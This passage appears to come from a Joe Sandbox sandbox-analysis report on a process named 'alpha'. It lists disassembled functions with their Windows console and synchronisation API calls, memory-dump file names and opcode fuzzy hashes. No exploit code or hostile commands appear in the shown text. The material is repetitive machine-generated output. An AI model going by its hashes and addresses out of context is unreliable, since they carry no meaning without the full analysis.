                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3841054028-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a0ed074c9a73614b2b916fca6f8c5ae93700137042c462b923e8755c54c764fe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2451F626A0875281E724AB159C201BBB6A5FF68754FCD8232DF5D472D4EF3CE451C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB5984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED3687
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF706EB260D), ref: 00007FF706ED36A6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF706EB260D), ref: 00007FF706ED36EB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED3703
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF706EB260D), ref: 00007FF706ED3722
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1066134489-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1aa8fb8d4516f8d76984f3f9ed3e018e4f1ed24fc801c9c3e1088435ddfa6839
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F519A66B0874297EA24AF21AC2417BE691FF45B94F8C8535DF1A07B90DF3CE4418A21
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB89C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 850181435-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a2dfd22914faaee84c5ebf64896b17a8da57df17c6a2113f2e9396a5a78d2c2f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1418F32608BC1CAE7609F20DC542EBB7A4FF89B49F945125DA4D4BB48CF38D546CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC34A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC3514
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC3522
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC3541
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC355E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: _get_osfhandle.MSVCRT ref: 00007FF706EC3715
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC3770
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC3791
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4057327938-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a74825b5d7cc602aeb656855faef3e3429d843fcbec7fe86b0a54b3a78d11cda
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21316026B08B42D6E750BB25AC2107BFAA1FF89751FC88175DA4E43795DF3CE8468620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDBE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 411561164-4129271751
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0bd1510264ad6a525eca875750ddf7de9561fe2ef1ab86ed7f2fb28c4ccdd0e8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25215E64E08B07C1FA14BB25AC6117BE6A1FF98794FD59231CA1E472E4EF3CA4448620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC01B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC01C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC01D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC0212
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC0228
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC023C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC0251
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 15b3ab58ef189e82df49708f05e2f499764ce3d68b4a193c3e3c126555c88307
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D021B03190CB82C7F6506B64ADB423AEAA0FF5A768FD44134DA1E436D1CF3DE4498720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC3578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fb7e821e22b86a36331ac920af21073845597b62414d249a111fce866a88ff72
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7118235A18B42C6EA10AB24AD6407AFAA0FF4A779F949374DA2F437D0CF3CD4458720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706ED71F9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706ED720D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706ED7300
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706ED5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF706ED75C4,?,?,00000000,00007FF706ED6999,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED5744
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 455305043-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 54c1a3e39d9dd2a9c58a49e8909538fa5e1ed4eecbaf0e525bce2aa0736c6a75
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46618062B1978285EF25AB659C742BBA3A1FF84B84FD84531DB0E07794EF3CD9058720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB1DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2401724867-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5f9834bfcfd32b433bd4e4604a644716ab51b4aace84f3882ad1ff47f429bab2
